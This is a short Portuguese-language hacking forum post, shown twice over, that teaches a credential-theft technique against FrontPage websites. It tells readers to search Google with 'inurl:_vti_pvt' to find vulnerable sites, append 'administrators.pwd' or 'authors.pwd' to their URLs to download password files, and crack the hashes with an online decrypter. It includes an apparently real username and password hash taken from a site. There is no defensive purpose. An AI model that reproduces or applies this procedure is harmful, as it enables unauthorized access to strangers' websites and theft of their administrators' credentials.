.
1º primeiro abra o Google,
digite: inurl:_vti_pvt
isso localiza sites feitos em frontpage, pois o frontpage cria essas pastas.
2º Explorando a vulnerabilidade.
clique em um site da pesquisa feita por: inurl:_vti_pvt
e adicione ao final da url:
administrators.pwd OU authors.pwd
exemplo:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
se der para explorar a vulnerabilidade aparecerá o usuário seguido da senha
ex:
# -FrontPage-
21stcapital:RzSXiKATauHFI
A senha virá criptografada, procure um decripter no google
Creditos: # SiD Nomore (No+)
.
1º primeiro abra o Google,
digite: inurl:_vti_pvt
isso localiza sites feitos em frontpage, pois o frontpage cria essas pastas.
2º Explorando a vulnerabilidade.
clique em um site da pesquisa feita por: inurl:_vti_pvt
e adicione ao final da url:
administrators.pwd OU authors.pwd
exemplo:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
se der para explorar a vulnerabilidade aparecerá o usuário seguido da senha
ex:
# -FrontPage-
21stcapital:RzSXiKATauHFI
A senha virá criptografada, procure um decripter no google
Creditos: # SiD Nomore (No+)
.
Comment